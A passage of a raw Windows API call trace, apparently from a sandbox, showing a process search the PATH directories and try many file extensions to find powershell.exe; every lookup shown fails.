GetFileAttributesExW (in: lpFileName="powershell.exe.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.765] CreateFileW (lpFileName="powershell.exe.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.765] GetFileAttributesExW (in: lpFileName="powershell.exe.jse" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.765] CreateFileW (lpFileName="powershell.exe.jse" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.765] GetFileAttributesExW (in: lpFileName="powershell.exe.wsf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.765] CreateFileW (lpFileName="powershell.exe.wsf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.765] GetFileAttributesExW (in: lpFileName="powershell.exe.wsh" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.765] CreateFileW (lpFileName="powershell.exe.wsh" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.765] GetFileAttributesExW (in: lpFileName="powershell.exe.msc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.765] CreateFileW (lpFileName="powershell.exe.msc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.766] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0xc00010c270, nSize=0x64 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0053.766] VirtualAlloc (lpAddress=0xc000144000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000144000 [0053.766] VirtualAlloc (lpAddress=0xc000146000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000146000 [0053.766] VirtualAlloc (lpAddress=0xc000148000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000148000 [0053.766] VirtualAlloc (lpAddress=0xc00014a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00014a000 [0053.766] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe" (normalized: "c:\\windows\\system32\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.767] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe" (normalized: "c:\\windows\\system32\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.767] VirtualAlloc (lpAddress=0xc00014c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00014c000 [0053.767] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.com" (normalized: "c:\\windows\\system32\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.767] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.com" (normalized: "c:\\windows\\system32\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.767] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.767] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.767] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.767] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.767] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.767] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.767] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.767] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.768] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.768] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.768] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.js" (normalized: "c:\\windows\\system32\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.768] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.js" (normalized: "c:\\windows\\system32\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.768] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.768] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.768] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.768] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.768] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.768] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.768] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.768] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.769] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe" (normalized: "c:\\windows\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.769] CreateFileW (lpFileName="C:\\Windows\\powershell.exe" (normalized: "c:\\windows\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.769] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.com" (normalized: "c:\\windows\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.769] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.com" (normalized: "c:\\windows\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.769] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.exe" (normalized: "c:\\windows\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.769] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.exe" (normalized: "c:\\windows\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.769] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.bat" (normalized: "c:\\windows\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.769] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.bat" (normalized: "c:\\windows\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.769] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.cmd" (normalized: "c:\\windows\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.769] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.cmd" (normalized: "c:\\windows\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.769] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.vbs" (normalized: "c:\\windows\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.769] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.vbs" (normalized: "c:\\windows\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.769] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.vbe" (normalized: "c:\\windows\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.770] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.vbe" (normalized: "c:\\windows\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.770] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.js" (normalized: "c:\\windows\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.770] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.js" (normalized: "c:\\windows\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.770] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.jse" (normalized: "c:\\windows\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.770] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.jse" (normalized: "c:\\windows\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.770] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.wsf" (normalized: "c:\\windows\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.770] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.wsf" (normalized: "c:\\windows\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.770] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.wsh" (normalized: "c:\\windows\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.770] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.wsh" (normalized: "c:\\windows\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.770] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.msc" (normalized: "c:\\windows\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.770] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.msc" (normalized: "c:\\windows\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.770] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.771] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.771] VirtualAlloc (lpAddress=0xc00014e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00014e000 [0053.771] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.com" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: 